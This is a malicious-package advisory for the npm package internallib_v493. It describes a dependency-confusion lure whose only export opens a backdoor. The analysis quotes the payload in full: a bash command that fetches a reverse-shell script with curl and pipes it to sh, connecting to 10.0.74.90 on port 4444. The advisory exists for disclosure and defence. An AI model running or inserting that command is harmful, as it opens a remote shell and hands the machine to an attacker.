VYPR

npm · Malicious package advisory

Malware

internallib_v493

MAL-2026-4585

Malicious code in internallib_v493 (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7)
The package's sole exported function `command()` in index.js executes `/bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh"`, fetching a reverse-shell script from reverse-shell.sh and piping it directly to `sh` to establish a connection back to 10.0.74.90 on port 4444. The package has no other functionality — its only advertised export is the backdoor. The package name (`internallib_v493`) and placeholder metadata (empty author, generic description) are consistent with a dependency-confusion / internal-name-squatting lure targeting organizations with private packages of similar names. A typo in the source (`reuquire` instead of `require`) means the payload throws on load in its current form, but the malicious intent is unambiguous and a corrected republish would fire immediately on any caller invoking the export.

Compromised versions (3)

  • 1.0.3
  • 1.0.4
  • 1.0.2

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.